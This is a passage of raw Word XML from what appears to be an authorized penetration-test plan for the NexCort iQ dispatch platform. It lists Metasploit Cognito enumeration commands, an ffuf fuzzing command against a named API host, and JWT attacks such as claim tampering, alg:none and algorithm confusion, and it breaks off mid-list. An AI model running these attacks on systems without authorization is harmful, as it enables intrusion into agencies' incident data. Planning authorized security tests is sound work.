          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Active exploitation uses discovered vulnerabilities to attempt to gain unauthorized access, escalate privileges, or extract data. This phase follows the reconnaissance and scanning phases and must only target systems with explicit written authorization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Methodology</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20"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="6120"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Map all endpoints, auth flows, and data paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite, ffuf, curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Vulnerability Scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated detection of known CVEs and misconfigs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="612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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nuclei, OWASP ZAP, npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Attempt to leverage discovered vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit, Burp Suite Pro, custom scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Post-Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Determine blast radius from a compromised foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="612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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Manual analysis, AWS CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Document every finding with reproduction steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6120"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Manual documentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Primary Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Launch Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Search for relevant modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:auxiliary name:jwt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">search type:exploit name:api</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">search cve:2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cognito user pool enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/scanner/http/cognito_user_enum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS cognito-idp.us-east-1.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">set USERPOOL_ID us-east-1_XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite Pro</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept all API traffic from the web and desktop clients</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Replay requests with modified JWT claims (tamper with agencyId, role, userId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Active scan all discovered endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test for IDOR — increment/modify resource IDs in URLs and request bodies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test CORS — send requests with arbitrary Origin headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf — Endpoint Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># Fuzz API paths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -w /usr/share/wordlists/api-paths.txt \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -u https://api.rapidcortex.us/FUZZ \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Authorization: Bearer {token}' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0EFF8" w:val="clear"/>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D1B69"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  -mc 200,201,202,301,302,401,403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NexCort iQ Specific Exploit Targets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT and API Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tamper with custom:agencyId claim — can a dispatcher access another agency's incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tamper with custom:role claim — can a dispatcher escalate to supervisor or rcsuperadmin?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm confusion — try HS256 with the Cognito public key as the HMAC secret</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">None algorithm — send JWT with alg: none and no signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expired token reuse — does the API accept tokens past their expiry?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D3A50"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CAD Integration Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
